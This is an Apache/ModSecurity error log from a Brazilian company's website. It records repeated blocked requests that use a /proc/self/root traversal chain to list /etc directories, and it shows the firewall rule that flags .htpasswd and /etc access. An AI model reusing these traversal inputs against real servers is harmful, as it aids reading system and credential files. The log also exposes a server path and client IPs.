https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:06.707404 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:44494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0TgbLMZ6AikZjR9UOGQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:07.059950 2026] [core:alert] [pid 26799:tid 140411582465792] [client 57.141.18.4:60330] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:58:10.125384 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:58:20.832286 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:46148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0XBkFeYa1D6dYQnCbywAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:22.475717 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:52030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0Xta6ubjKNq_cu4bpWQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:24.667998 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:52034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0X9a6ubjKNq_cu4bpWgAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:29.055064 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:52048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0ZQbLMZ6AikZjR9UOJgAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:32.143319 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56514] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:58:33.235538 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.241.31:49062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0aRkFeYa1D6dYQnCb1AAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:39.248537 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:49072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0b_u8EFLIOrSqIptL-AAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:41.159286 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:54010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0cf-YZRR_7pZ7nDI_OwAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:43.047105 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:54022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0c-oXxyEfFpUF8f_CzgAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:46.695330 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:54030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0duyqAr6etmhZHNoVdwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:48.073156 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:59196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0ePu8EFLIOrSqIptMAQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:52.511767 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:59200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0fOoXxyEfFpUF8f_C3AAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:55.129814 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57278] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:58:57.046366 2026] [core:alert] [pid 17653:tid 140411574073088] [client 57.141.18.106:33952] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:58:59.970368 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:59202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0gxkFeYa1D6dYQnCb8wAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:03.158056 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:51388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0h9a6ubjKNq_cu4bpdgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:04.383355 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:46278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0iBkFeYa1D6dYQnCcAQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:59:05.394964 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:51398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0icdf6f5d65gmYZQilAAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:08.910880 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:54182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0iymAPhZkrhU8w4m4TgAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:08.922121 2026] [core:alert] [pid 30077:tid 140411658000128] [client 57.141.18.72:34534] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:59:11.147018 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.241.31:54190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0jymAPhZkrhU8w4m4UwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:15.196629 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:54202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0k-oXxyEfFpUF8f_C7AAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:59:20.082519 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:59:31.169916 2026] [mime_magic:error] [pid 17653:tid 140411624429312] (70014)End of file found: [client 57.141.18.22:35194] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:59:31.888074 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:41740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0o_u8EFLIOrSqIptMJAAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
